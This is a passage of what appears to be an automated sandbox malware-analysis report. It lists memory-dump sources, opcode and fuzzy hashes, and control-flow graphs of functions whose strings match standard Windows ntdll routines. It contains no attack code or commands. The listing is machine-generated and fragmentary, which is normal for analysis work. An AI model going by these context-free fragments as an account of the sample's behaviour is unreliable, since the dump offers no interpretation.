                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6a4a9290f1865b8a0632bb085e9ab392e83ffebbc73f4cea8403e21ba2205b08
                                                                            • Instruction ID: 5c5d64a1007cc660e45cb0e6b1fd18ae185f554682bcdf9f4dd5dab41b83dc6d
                                                                            • Opcode Fuzzy Hash: 6a4a9290f1865b8a0632bb085e9ab392e83ffebbc73f4cea8403e21ba2205b08
                                                                            • Instruction Fuzzy Hash: F790023120241802D580B2584404A4E000587D2301FD5C015B0125634DCF15CB6977A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: da2702dd17c718c157ca1ad0c5b8a02c4e7253c17ed3e4b451e791aaa7a55eee
                                                                            • Instruction ID: dc84d69390603250549a0076c3d594f26a855ab2ec2367025217bd1949ebd2f8
                                                                            • Opcode Fuzzy Hash: da2702dd17c718c157ca1ad0c5b8a02c4e7253c17ed3e4b451e791aaa7a55eee
                                                                            • Instruction Fuzzy Hash: 9C90023120645842D540B2584404E4A001587D1305F95C011B0164674D9B25CE65B661
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 42f1eca48bdfcaaee7632c27733f2236341f08b94b495593bbfae098058b845b
                                                                            • Instruction ID: 423a0483a43e470967905b57594b63784a6b05c669eeb7dbd2d47f7cd45af285
                                                                            • Opcode Fuzzy Hash: 42f1eca48bdfcaaee7632c27733f2236341f08b94b495593bbfae098058b845b
                                                                            • Instruction Fuzzy Hash: 3290023160641802D550B2584414B4A000587D1301F95C011B0124634D8B55CB6576A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1707b2ef7a157f57fb90d0b792284e306ef14a0554c603ee238a1e6331781b9d
                                                                            • Instruction ID: 6b0233b36b913466aea75ef0beeb41086ce7357d576e25947eb0f280819fecb8
                                                                            • Opcode Fuzzy Hash: 1707b2ef7a157f57fb90d0b792284e306ef14a0554c603ee238a1e6331781b9d
                                                                            • Instruction Fuzzy Hash: 4C90023120241802D504B2584804A8A000587D1301F95C011B6124635E9B65C9A17131
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 49d3e65b9010bb47c0bff1ae521eed92515350968979b66174bb99b061b604a6
                                                                            • Instruction ID: 79e6dffdc9d9214cc3769c63479f4c443b3b54cff969340a06d3613302e03971
                                                                            • Opcode Fuzzy Hash: 49d3e65b9010bb47c0bff1ae521eed92515350968979b66174bb99b061b604a6
                                                                            • Instruction Fuzzy Hash: 46900225222410020545F658060490F044597D73513D5C015F1516570CCB21C9755321
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a0ef9eb76c780ae9b458e32e4c513ae24e9ea5035230637704d3524d4f703eab
                                                                            • Instruction ID: 87a7e95dca2a0a815c908240c17a1261483340ea55795d33332cd08c347cc586
                                                                            • Opcode Fuzzy Hash: a0ef9eb76c780ae9b458e32e4c513ae24e9ea5035230637704d3524d4f703eab
                                                                            • Instruction Fuzzy Hash: 11900225212410030505F658070490B004687D6351395C021F1115530CDB21C9715121
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1644e07a1e7d8a4efc0bb77df559ca8f95b19f242cfad82915da8d59949bf53a
                                                                            • Instruction ID: 8171c4f578656d3e4c5ea71e1a7d6c3844d92fb52326764b58d7bb95c385a322
                                                                            • Opcode Fuzzy Hash: 1644e07a1e7d8a4efc0bb77df559ca8f95b19f242cfad82915da8d59949bf53a
                                                                            • Instruction Fuzzy Hash: 029002A1202550924900F3588404F0E450587E1201B95C016F1154530CCA25C9619135
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dfc973ac04ea0c279afbaf462fec0cb872fe4f76111ed1d07c05735b971e4aaf
                                                                            • Instruction ID: 1bf322b9717f0fc1a9ab7e3ab0947ede05f579d73c77da86fa056ae1f95c2994
                                                                            • Opcode Fuzzy Hash: dfc973ac04ea0c279afbaf462fec0cb872fe4f76111ed1d07c05735b971e4aaf
                                                                            • Instruction Fuzzy Hash: 1E900261602510424540B258480480A600597E23013D5C115B0654530C8B18C9659269
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 93e0b9bd58ec08e8f96d47e60dce2e66b80cc043f4a0666de99baf80f59f4e23
                                                                            • Instruction ID: c4a26353a1d52e6f4bcec1c64e438d887a343be4b5a39cd26c4f1881c876c2d8
                                                                            • Opcode Fuzzy Hash: 93e0b9bd58ec08e8f96d47e60dce2e66b80cc043f4a0666de99baf80f59f4e23
                                                                            • Instruction Fuzzy Hash: CF900231606810129540B258488494A400597E1301B95C011F0524534C8F14CA665361
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction ID: e4a6a890a9ad2f738e514491fe6b93baba0240807917e46f1cd6a2d90c8e4602
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash:

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1127 1f7e2890-1f7e28b3 1128 1f7e28b9-1f7e28cc 1127->1128 1129 1f81a4bc-1f81a4c0 1127->1129 1130 1f7e28ce-1f7e28d7 1128->1130 1131 1f7e28dd-1f7e28df 1128->1131 1129->1128 1132 1f81a4c6-1f81a4ca 1129->1132 1130->1131 1133 1f81a57e-1f81a585 1130->1133 1134 1f7e28e1-1f7e28e5 1131->1134 1132->1128 1135 1f81a4d0-1f81a4d4 1132->1135 1133->1131 1136 1f7e28eb-1f7e28fa 1134->1136 1137 1f7e2988-1f7e298e 1134->1137 1135->1128 1138 1f81a4da-1f81a4de 1135->1138 1140 1f81a58a-1f81a58d 1136->1140 1141 1f7e2900-1f7e2905 1136->1141 1142 1f7e2908-1f7e290c 1137->1142 1138->1128 1139 1f81a4e4-1f81a4eb 1138->1139 1143 1f81a564-1f81a56c 1139->1143 1144 1f81a4ed-1f81a4f4 1139->1144 1140->1142 1141->1142 1142->1134 1145 1f7e290e-1f7e291b 1142->1145 1143->1128 1150 1f81a572-1f81a576 1143->1150 1146 1f81a4f6-1f81a4fe 1144->1146 1147 1f81a50b 1144->1147 1148 1f81a592-1f81a599 1145->1148 1149 1f7e2921 1145->1149 1146->1128 1151 1f81a504-1f81a509 1146->1151 1152 1f81a510-1f81a536 call 1f7f0050 1147->1152 1155 1f81a5a1-1f81a5c9 call 1f7f0050 1148->1155 1153 1f7e2924-1f7e2926 1149->1153 1150->1128 1154 1f81a57c call 1f7f0050 1150->1154 1151->1152 1168 1f81a55d-1f81a55f 1152->1168 1157 1f7e2928-1f7e292a 1153->1157 1158 1f7e2993-1f7e2995 1153->1158 1154->1168 1164 1f7e292c-1f7e292e 1157->1164 1165 1f7e2946-1f7e2966 call 1f7f0050 1157->1165 1158->1157 1162 1f7e2997-1f7e29b1 call 1f7f0050 1158->1162 1176 1f7e2969-1f7e2974 1162->1176 1164->1165 1171 1f7e2930-1f7e2944 call 1f7f0050 1164->1171 1165->1176 1174 1f7e2981-1f7e2985 1168->1174 1171->1165 1176->1153 1178 1f7e2976-1f7e2979 1176->1178 1178->1155 1179 1f7e297f 1178->1179 1179->1174
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 459901f8b42966d72a47cea931f343c41560516128bfc885efbe70e5fd9d50d9
                                                                            • Instruction ID: f91c1c97e38952deec2b7d285d147160c72cda031d005ac599e1bf03dfb3724b
                                                                            • Opcode Fuzzy Hash: 459901f8b42966d72a47cea931f343c41560516128bfc885efbe70e5fd9d50d9
                                                                            • Instruction Fuzzy Hash: E451CCB5E04156BFCB11DBA8DC9057EF7B8BB49300B50826AE468DB642D734EE50C7E0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1180 1f852410-1f852433 1181 1f8524ec-1f8524ff 1180->1181 1182 1f852439-1f85243d 1180->1182 1184 1f852501-1f85250a 1181->1184 1185 1f852513-1f852515 1181->1185 1182->1181 1183 1f852443-1f852447 1182->1183 1183->1181 1186 1f85244d-1f852451 1183->1186 1184->1185 1187 1f85250c 1184->1187 1188 1f852517-1f85251b 1185->1188 1186->1181 1189 1f852457-1f85245b 1186->1189 1187->1185 1190 1f85251d-1f85252c 1188->1190 1191 1f852538-1f85253e 1188->1191 1189->1181 1192 1f852461-1f852468 1189->1192 1193 1f852540 1190->1193 1194 1f85252e-1f852536 1190->1194 1195 1f852543-1f852547 1191->1195 1196 1f8524b6-1f8524be 1192->1196 1197 1f85246a-1f852471 1192->1197 1193->1195 1194->1195 1195->1188 1198 1f852549-1f852556 1195->1198 1196->1181 1201 1f8524c0-1f8524c4 1196->1201 1199 1f852484 1197->1199 1200 1f852473-1f85247b 1197->1200 1202 1f852564 1198->1202 1203 1f852558-1f852562 1198->1203 1207 1f852489-1f8524ab call 1f7f0510 1199->1207 1200->1181 1206 1f85247d-1f852482 1200->1206 1201->1181 1204 1f8524c6-1f8524ea call 1f7f0510 1201->1204 1205 1f852567-1f852569 1202->1205 1203->1205 1217 1f8524ae-1f8524b1 1204->1217 1209 1f85258d-1f85258f 1205->1209 1210 1f85256b-1f85256d 1205->1210 1206->1207 1207->1217 1214 1f852591-1f852593 1209->1214 1215 1f8525ae-1f8525d0 call 1f7f0510 1209->1215 1210->1209 1213 1f85256f-1f85258b call 1f7f0510 1210->1213 1225 1f8525d3-1f8525df 1213->1225 1214->1215 1219 1f852595-1f8525ab call 1f7f0510 1214->1219 1215->1225 1224 1f852615-1f852619 1217->1224 1219->1215 1225->1205 1227 1f8525e1-1f8525e4 1225->1227 1228 1f8525e6-1f852610 call 1f7f0510 1227->1228 1229 1f852613 1227->1229 1228->1229 1229->1224
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 6915fdda42b8a7582d271564254dcf8dccb554a804c1f3292b9c7c983253c489
                                                                            • Instruction ID: fa19e7932778a3284f96f498a281cfc1c9c54e25ab56ea3675865e23e8ee11b7
                                                                            • Opcode Fuzzy Hash: 6915fdda42b8a7582d271564254dcf8dccb554a804c1f3292b9c7c983253c489
                                                                            • Instruction Fuzzy Hash: A351B375A00686AFCB64DFACCC9097FB7F9AB48300B408469F5E5DB651EE74FA408760

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1429 1f87a670-1f87a6e9 call 1f7b2410 * 2 RtlDebugPrintTimes 1435 1f87a89f-1f87a8c4 call 1f7b25b0 * 2 call 1f7e4c30 1429->1435 1436 1f87a6ef-1f87a6fa 1429->1436 1438 1f87a724 1436->1438 1439 1f87a6fc-1f87a709 1436->1439 1443 1f87a728-1f87a734 1438->1443 1441 1f87a70f-1f87a715 1439->1441 1442 1f87a70b-1f87a70d 1439->1442 1445 1f87a7f3-1f87a7f5 1441->1445 1446 1f87a71b-1f87a722 1441->1446 1442->1441 1447 1f87a741-1f87a743 1443->1447 1448 1f87a81f-1f87a821 1445->1448 1446->1443 1449 1f87a736-1f87a73c 1447->1449 1450 1f87a745-1f87a747 1447->1450 1452 1f87a827-1f87a834 1448->1452 1453 1f87a755-1f87a77d RtlDebugPrintTimes 1448->1453 1455 1f87a73e 1449->1455 1456 1f87a74c-1f87a750 1449->1456 1450->1448 1458 1f87a836-1f87a843 1452->1458 1459 1f87a85a-1f87a866 1452->1459 1453->1435 1467 1f87a783-1f87a7a0 RtlDebugPrintTimes 1453->1467 1455->1447 1457 1f87a86c-1f87a86e 1456->1457 1457->1448 1462 1f87a845-1f87a849 1458->1462 1463 1f87a84b-1f87a851 1458->1463 1464 1f87a87b-1f87a87d 1459->1464 1462->1463 1468 1f87a857 1463->1468 1469 1f87a96b-1f87a96d 1463->1469 1465 1f87a870-1f87a876 1464->1465 1466 1f87a87f-1f87a881 1464->1466 1471 1f87a8c7-1f87a8cb 1465->1471 1472 1f87a878 1465->1472 1470 1f87a883-1f87a889 1466->1470 1467->1435 1477 1f87a7a6-1f87a7cc RtlDebugPrintTimes 1467->1477 1468->1459 1469->1470 1473 1f87a8d0-1f87a8f4 RtlDebugPrintTimes 1470->1473 1474 1f87a88b-1f87a89d RtlDebugPrintTimes 1470->1474 1476 1f87a99f-1f87a9a1 1471->1476 1472->1464 1473->1435 1480 1f87a8f6-1f87a913 RtlDebugPrintTimes 1473->1480 1474->1435 1477->1435 1482 1f87a7d2-1f87a7d4 1477->1482 1480->1435 1487 1f87a915-1f87a944 RtlDebugPrintTimes 1480->1487 1484 1f87a7f7-1f87a80a 1482->1484 1485 1f87a7d6-1f87a7e3 1482->1485 1486 1f87a817-1f87a819 1484->1486 1488 1f87a7e5-1f87a7e9 1485->1488 1489 1f87a7eb-1f87a7f1 1485->1489 1490 1f87a80c-1f87a812 1486->1490 1491 1f87a81b-1f87a81d 1486->1491 1487->1435 1495 1f87a94a-1f87a94c 1487->1495 1488->1489 1489->1445 1489->1484 1492 1f87a814 1490->1492 1493 1f87a868-1f87a86a 1490->1493 1491->1448 1492->1486 1493->1457 1496 1f87a972-1f87a985 1495->1496 1497 1f87a94e-1f87a95b 1495->1497 1500 1f87a992-1f87a994 1496->1500 1498 1f87a963-1f87a969 1497->1498 1499 1f87a95d-1f87a961 1497->1499 1498->1469 1498->1496 1499->1498 1501 1f87a987-1f87a98d 1500->1501 1502 1f87a996 1500->1502 1503 1f87a98f 1501->1503 1504 1f87a99b-1f87a99d 1501->1504 1502->1466 1503->1500 1504->1476
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: HEAP:
                                                                            • API String ID: 3446177414-2466845122
                                                                            • Opcode ID: 156cee18f346d59464111f865a61760094497bb8af54c16e8e6732b408c53c2a
                                                                            • Instruction ID: 4ef8482c9da872c50d6d75cc254577dcab3097cd0d27f7c4d690ca22690ffcce
                                                                            • Opcode Fuzzy Hash: 156cee18f346d59464111f865a61760094497bb8af54c16e8e6732b408c53c2a
                                                                            • Instruction Fuzzy Hash: ECA16C75B042168FC708CEA8C894B1AF7E5BF88750F15466DE946DB361EB31EC42CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1505 1f7d7630-1f7d7651 1506 1f7d768b-1f7d7699 call 1f7e4c30 1505->1506 1507 1f7d7653-1f7d766f call 1f7ae660 1505->1507 1512 1f7d7675-1f7d7682 1507->1512 1513 1f814638 1507->1513 1514 1f7d769a-1f7d76a9 call 1f7d7818 1512->1514 1515 1f7d7684 1512->1515 1517 1f81463f-1f814645 1513->1517 1521 1f7d76ab-1f7d76c1 call 1f7d77cd 1514->1521 1522 1f7d7701-1f7d770a 1514->1522 1515->1506 1519 1f7d76c7-1f7d76d0 call 1f7d7728 1517->1519 1520 1f81464b-1f8146b8 call 1f82f290 call 1f7e9020 RtlDebugPrintTimes BaseQueryModuleData 1517->1520 1519->1522 1532 1f7d76d2 1519->1532 1520->1519 1537 1f8146be-1f8146c6 1520->1537 1521->1517 1521->1519 1525 1f7d76d8-1f7d76e1 1522->1525 1529 1f7d770c-1f7d770e 1525->1529 1530 1f7d76e3-1f7d76f2 call 1f7d771b 1525->1530 1536 1f7d76f4-1f7d76f6 1529->1536 1530->1536 1532->1525 1539 1f7d76f8-1f7d76fa 1536->1539 1540 1f7d7710-1f7d7719 1536->1540 1537->1519 1541 1f8146cc-1f8146d3 1537->1541 1539->1515 1542 1f7d76fc 1539->1542 1540->1539 1541->1519 1543 1f8146d9-1f8146e4 1541->1543 1544 1f8147be-1f8147d0 call 1f7e2c50 1542->1544 1545 1f8147b9 call 1f7e4d48 1543->1545 1546 1f8146ea-1f814723 call 1f82f290 call 1f7eaaa0 1543->1546 1544->1515 1545->1544 1554 1f814725-1f814736 call 1f82f290 1546->1554 1555 1f81473b-1f81476b call 1f82f290 1546->1555 1554->1522 1555->1519 1560 1f814771-1f81477f call 1f7ea770 1555->1560 1563 1f814781-1f814783 1560->1563 1564 1f814786-1f8147a3 call 1f82f290 call 1f81cf9e 1560->1564 1563->1564 1564->1519 1569 1f8147a9-1f8147b2 1564->1569 1569->1560 1570 1f8147b4 1569->1570 1570->1519
                                                                            Strings
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1F814655
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 1F814787
                                                                            • Execute=1, xrefs: 1F814713
                                                                            • ExecuteOptions, xrefs: 1F8146A0
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1F814725
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1F8146FC
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1F814742
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: c0b9be0e2cf958f8423fb0a521c1b7672dbf93a447484d08c222a26c3f73b153
                                                                            • Instruction ID: b77371512282cd354ac86c36573f30df267cb3c59eda5fc8275c899c12e09581
                                                                            • Opcode Fuzzy Hash: c0b9be0e2cf958f8423fb0a521c1b7672dbf93a447484d08c222a26c3f73b153
                                                                            • Instruction Fuzzy Hash: AF513835600359BBDF109AA8EC88FE9B7B9EF09310F9005A9E505AB181F771BA46CB50
                                                                            Strings
                                                                            • Actx , xrefs: 1F807A0C, 1F807A73
                                                                            • SsHd, xrefs: 1F7BA3E4
                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F8079D5
                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F8079D0, 1F8079F5
                                                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1F807AE6
                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F8079FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                            • API String ID: 0-1988757188
                                                                            • Opcode ID: bfddb2c45feec91e5c710a22cc3bc48625442457f32ae12591a6f9d152a37fa8
                                                                            • Instruction ID: 6d5172e452e9d8569f88e17d028562e155c8ce3d2afd8cf8772bbc687acc1de4
                                                                            • Opcode Fuzzy Hash: bfddb2c45feec91e5c710a22cc3bc48625442457f32ae12591a6f9d152a37fa8
                                                                            • Instruction Fuzzy Hash: 96E19F70A083428FE714FF28C894B5AB7E1AF86315F514B2DEDA5CB290E731E945CB91
                                                                            APIs
                                                                            Strings
                                                                            • GsHd, xrefs: 1F7BD874
                                                                            • Actx , xrefs: 1F809508
                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F809346
                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 1F809341, 1F809366
                                                                            • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1F809565
                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1F80936B
                                                                            Memory Dump Source
